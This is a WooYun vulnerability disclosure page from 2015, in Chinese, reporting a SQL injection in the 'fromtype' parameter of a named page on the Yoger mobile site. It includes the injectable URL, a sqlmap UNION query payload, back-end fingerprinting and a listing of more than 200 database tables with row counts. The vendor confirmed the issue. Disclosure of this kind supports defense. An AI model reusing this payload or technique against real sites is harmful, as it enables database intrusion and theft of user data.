优个网某站存在SQL注入漏洞 | wooyun-2015-0103967| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0103967

漏洞标题：优个网某站存在SQL注入漏洞

漏洞作者：疏懒

提交时间：2015-03-27 15:58

修复时间：2015-05-14 09:18

公开时间：2015-05-14 09:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-27：细节已通知厂商并且等待厂商处理中
2015-03-30：厂商已经确认，细节仅向厂商公开
2015-04-09：细节向核心白帽子及相关领域专家公开
2015-04-19：细节向普通白帽子公开
2015-04-29：细节向实习白帽子公开
2015-05-14：细节向公众公开

简要描述：

优个网某站存在SQL注入漏洞

详细说明：

注入点

http://m.yoger.com.cn/poster.php?zcid=569&fromtype=wap

单引号检测发现泄露绝对路径

经检测参数fromtype存在注入

漏洞证明：

sqlmap identified the following injection points with a total of 137 HTTP(s) req
uests:
---
Place: GET
Parameter: fromtype
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: zcid=569&fromtype=wap' UNION ALL SELECT NULL,CHAR(58) CHAR(107) CHA
R(113) CHAR(107) CHAR(58) CHAR(65) CHAR(90) CHAR(79) CHAR(83) CHAR(114) CHAR(68)
 CHAR(97) CHAR(119) CHAR(108) CHAR(120) CHAR(58) CHAR(115) CHAR(118) CHAR(99) CH
AR(58),NULL,NULL,NULL,NULL,NULL--
---
[17:31:28] [INFO] testing Microsoft SQL Server
[17:31:28] [INFO] confirming Microsoft SQL Server
[17:31:30] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: PHP 5.2.11, Apache 2.2.13
back-end DBMS: Microsoft SQL Server 2000

对数据库“cn36008”进行猜解，发现有200多张表

Database: cn36008
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| dbo.syncobj_0x4645343244413736 | 870347  |
| dbo.Uto_poDetail               | 870347  |
| dbo.syncobj_0x3538323538363734 | 861565  |
| dbo.Uto_poFlow                 | 861563  |
| dbo.syncobj_0x3743304131423830 | 629197  |
| dbo.Uto_sList                  | 629196  |
| dbo.syncobj_0x4331394132394346 | 446921  |
| dbo.Uto_fList                  | 446921  |
| dbo.syncobj_0x3534453846373443 | 283657  |
| dbo.Uto_msgbox                 | 283657  |
| dbo.syncobj_0x4236463744333743 | 273882  |
| dbo.Uto_tosumFree              | 273882  |
| dbo.syncobj_0x3239333636393234 | 273645  |
| dbo.Uto_fAccount               | 273645  |
| dbo.syncobj_0x3438314438394637 | 267553  |
| dbo.Uto_porder                 | 267553  |
| dbo.syncobj_0x4632343644304242 | 258630  |
| dbo.Uto_Utor                   | 258630  |
| dbo.syncobj_0x3541384534344236 | 255391  |
| dbo.Uto_prdComState            | 255389  |
| dbo.syncobj_0x4338454436444636 | 227338  |
| dbo.Uto_prdComment             | 227338  |
| dbo.syncobj_0x3037384431314430 | 157706  |
| dbo.Uto_Score                  | 157705  |
| dbo.syncobj_0x4239343233323832 | 156003  |
| dbo.Uto_unClick                | 156002  |
| dbo.syncobj_0x3238454644314135 | 111033  |
| dbo.Uto_custom                 | 111033  |
| dbo.syncobj_0x3143313739363030 | 103273  |
| dbo.Uto_UtorContact            | 103273  |
| dbo.syncobj_0x3538413939433133 | 97830   |
| dbo.Uto_ordQuestion            | 97830   |
| dbo.syncobj_0x3845303933363634 | 88581   |
| dbo.Uto_prdFavorite            | 88581   |
| dbo.syncobj_0x3245394630383231 | 57040   |
| dbo.Uto_card                   | 57040   |
| dbo.syncobj_0x4344463342313835 | 54596   |
| dbo.Uto_unOrderflow            | 54596   |
| dbo.syncobj_0x4430334537373141 | 50841   |
| dbo.Uto_Linkprd                | 50841   |
| dbo.syncobj_0x4145383244413132 | 49602   |
| dbo.Uto_prdspec                | 49602   |
| dbo.syncobj_0x4342383433364231 | 37964   |
| dbo.Uto_tList                  | 37963   |
| dbo.qz_user                    | 35754   |
| dbo.syncobj_0x3538393242443843 | 35754   |
| dbo.syncobj_0x3536423246363344 | 30962   |
| dbo.Yoger_buyerIdea            | 30962   |
| dbo.syncobj_0x3435453035333142 | 28960   |
| dbo.Uto_prdPic                 | 28960   |
| dbo.syncobj_0x4437393236413045 | 27839   |
| dbo.Yoger_prdSku               | 27839   |
| dbo.syncobj_0x3930344543423435 | 26595   |
| dbo.Uto_tuanList               | 26595   |
| dbo.syncobj_0x3037374632343535 | 25722   |
| dbo.Yoger_prdSku_spec          | 25722   |
| dbo.syncobj_0x4638443331374436 | 20252   |
| dbo.Uto_info                   | 20252   |
| dbo.Uto_cart                   | 17382   |
| dbo.syncobj_0x4246343039423333 | 9951    |
| dbo.Uto_product                | 9951    |
| dbo.syncobj_0x4436324445384646 | 9921    |
| dbo.Yoger_prdKey               | 9921    |
| dbo.syncobj_0x4541383234304531 | 6306    |
| dbo.Uto_bbsInfo                | 6306    |
| dbo.syncobj_0x4635454231354639 | 5800    |
| dbo.Uto_bbsComment             | 5800    |
| dbo.syncobj_0x3938424638463234 | 5124    |
| dbo.Uto_present                | 5124    |
| dbo.syncobj_0x3843304630373635 | 4214    |
| dbo.Uto_ExSort                 | 4214    |
| dbo.syncobj_0x3032413444414334 | 3824    |
| dbo.Uto_sysLog                 | 3824    |
| dbo.Uto_region                 | 3562    |
| dbo.syncobj_0x3632383246303938 | 2649    |
| dbo.Yoger_orgerMenu            | 2649    |
| dbo.syncobj_0x3134424143303637 | 2460    |
| dbo.Uto_infoComment            | 2460    |
| dbo.syncobj_0x3136364330363938 | 2340    |
| dbo.Yoger_OutOfStockLog        | 2340    |
| dbo.syncobj_0x3333343133384645 | 2263    |
| dbo.Yoger_partnerList          | 2263    |
| dbo.syncobj_0x3038463432433743 | 1937    |
| dbo.Uto_partner                | 1937    |
| dbo.syncobj_0x3246353236313934 | 1817    |
| dbo.Uto_DD                     | 1817    |
| dbo.syncobj_0x4143414242353134 | 1504    |
| dbo.Uto_search                 | 1504    |
| dbo.syncobj_0x4241453737313232 | 1396    |
| dbo.Yoger_tuihuo               | 1396    |
| dbo.syncobj_0x4433383744443245 | 1102    |
| dbo.Uto_exchange               | 1102    |
| dbo.syncobj_0x3046453132394433 | 922     |
| dbo.Yoger_PriceList            | 922     |
| dbo.syncobj_0x4335424338453244 | 829     |
| dbo.Yoger_keywords             | 829     |
| dbo.sysconstraints             | 633     |
| dbo.syncobj_0x3146423537434641 | 571     |
| dbo.Yoger_adsManage            | 571     |
| dbo.syncobj_0x4244393131323330 | 570     |
| dbo.Uto_unAlist                | 570     |
| dbo.syncobj_0x3331373545393337 | 438     |
| dbo.Uto_prdSort                | 438     |
| dbo.syncobj_0x4534464444433641 | 424     |
| dbo.Yoger_prdPersonal          | 424     |
| dbo.syncobj_0x4531363132434635 | 346     |
| dbo.Uto_limitTime              | 346     |
| dbo.syncobj_0x3642383335373030 | 339     |
| dbo.Yoger_detection            | 339     |
| dbo.syncobj_0x3335423435363632 | 333     |
| dbo.Uto_tuan                   | 333     |
| dbo.syncobj_0x3932353535343342 | 294     |
| dbo.Yoger_stiga                | 294     |
| dbo.qz_order                   | 253     |
| dbo.syncobj_0x4132324634364446 | 253     |
| dbo.syncobj_0x4535383334413543 | 242     |
| dbo.Uto_unadsList              | 242     |
| dbo.syssubscriptions           | 208     |
| dbo.syncobj_0x4434314541393035 | 178     |
| dbo.Uto_formula                | 178     |
| dbo.syncobj_0x3131393746453636 | 176     |
| dbo.Uto_unAccount              | 176     |
| dbo.syncobj_0x3735414433363632 | 173     |
| dbo.Yoger_prdBrand             | 173     |
| dbo.syncobj_0x4331333938353645 | 169     |
| dbo.Uto_unioner                | 169     |
| dbo.qz_actioners               | 168     |
| dbo.syncobj_0x3939434530363044 | 168     |
| dbo.syncobj_0x3931374135424542 | 149     |
| dbo.Uto_infoSort               | 149     |
| dbo.syncobj_0x3341364234353144 | 129     |
| dbo.Yoger_buyfree              | 129     |
| dbo.syncobj_0x4535464139443435 | 122     |
| dbo.wap_zhuanchang             | 122     |
| dbo.syncobj_0x3936384636384233 | 120     |
| dbo.Uto_sysMenu                | 120     |
| dbo.sysextendedarticlesview    | 104     |
| dbo.sysarticles                | 103     |
| dbo.syncobj_0x3443393930423342 | 102     |
| dbo.Uto_auList                 | 102     |
| dbo.syncobj_0x3235433442443934 | 99      |
| dbo.Yoger_alterList            | 99      |
| dbo.syncobj_0x3642313631333042 | 68      |
| dbo.Uto_payment                | 68      |
| dbo.syncobj_0x3535343536443339 | 65      |
| dbo.Yoger_puorderDetail        | 65      |
| dbo.uto_suggest                | 57      |
| dbo.syncobj_0x4537374231463046 | 50      |
| dbo.Uto_aucomment              | 50      |
| dbo.syncobj_0x3445303137464145 | 49      |
| dbo.Uto_poAlert                | 49      |
| dbo.syncobj_0x4537324335383045 | 38      |
| dbo.Yoger_giftInfo             | 38      |
| dbo.syncobj_0x3833343745313841 | 37      |
| dbo.Uto_orger                  | 37      |
| dbo.syncobj_0x3037374230394335 | 35      |
| dbo.Yoger_cardAuto             | 35      |
| dbo.syncobj_0x3630324244393343 | 34      |
| dbo.Yoger_invi                 | 34      |
| dbo.syncobj_0x4334303037323635 | 31      |
| dbo.Uto_auTorder               | 31      |
| dbo.qz_smrz                    | 28      |
| dbo.syncobj_0x3232394644423238 | 28      |
| dbo.syncobj_0x3241304534313542 | 27      |
| dbo.Yoger_alter_persent        | 27      |
| dbo.syncobj_0x3631394330454536 | 26      |
| dbo.Uto_bbsSort                | 26      |
| dbo.syncobj_0x3143433638343038 | 20      |
| dbo.Yoger_giftList             | 20      |
| dbo.syncobj_0x4544433745413330 | 19      |
| dbo.Yoger_giftCard             | 19      |
| dbo.syncobj_0x3834333732444533 | 14      |
| dbo.Yoger_purchaseOrder        | 14      |
| dbo.qz_account                 | 12      |
| dbo.syncobj_0x3243413135393937 | 12      |
| dbo.syncobj_0x3635314230453945 | 12      |
| dbo.syncobj_0x4330364345313637 | 12      |
| dbo.syncobj_0x4637433930393432 | 12      |
| dbo.Uto_poTo                   | 12      |
| dbo.Uto_sysSet                 | 12      |
| dbo.Yoger_infoTopic            | 12      |
| dbo.fx_product                 | 10      |
| dbo.qz_travelers               | 9       |
| dbo.syncobj_0x3346364544333838 | 9       |
| dbo.syncobj_0x4146333941424442 | 9       |
| dbo.Uto_unionads               | 9       |
| dbo.syncobj_0x3332343935373235 | 8       |
| dbo.Uto_auction                | 8       |
| dbo.syncobj_0x3835313034314543 | 7       |
| dbo.syncobj_0x3946454645324131 | 7       |
| dbo.Uto_orgGroup               | 7       |
| dbo.Uto_orgRole                | 7       |
| dbo.syncobj_0x3141423646443632 | 6       |
| dbo.syncobj_0x3542414637453544 | 6       |
| dbo.syncobj_0x4133443944434142 | 6       |
| dbo.Uto_orgDept                | 6       |
| dbo.Yoger_msgboxAuto           | 6       |
| dbo.Yoger_productTopic         | 6       |
| dbo.syncobj_0x4143443046304241 | 3       |
| dbo.syssegments                | 3       |
| dbo.Uto_UtorLayer              | 3       |
| dbo.syncobj_0x3130434237344245 | 1       |
| dbo.syncobj_0x3830413543343336 | 1       |
| dbo.syncobj_0x4536384239413437 | 1       |
| dbo.syspublications            | 1       |
| dbo.sysschemaarticles          | 1       |
| dbo.Uto_org                    | 1       |
| dbo.Uto_poSet                  | 1       |
| dbo.Yoger_sortTopic            | 1       |
+--------------------------------+---------+

后面就未深入了。。。求高分

修复方案：

你懂的

版权声明：转载请注明来源疏懒@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-03-30 09:17

厂商回复：

已经在处理了，谢谢！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0103967

漏洞标题：优个网某站存在SQL注入漏洞

相关厂商：yoger.com.cn

漏洞作者：疏懒

提交时间：2015-03-27 15:58

修复时间：2015-05-14 09:18

公开时间：2015-05-14 09:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源疏懒@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0103967

漏洞标题：优个网某站存在SQL注入漏洞

相关厂商：yoger.com.cn

漏洞作者： 疏懒

提交时间：2015-03-27 15:58

修复时间：2015-05-14 09:18

公开时间：2015-05-14 09:18

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0103967"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 疏懒@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：疏懒

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源疏懒@乌云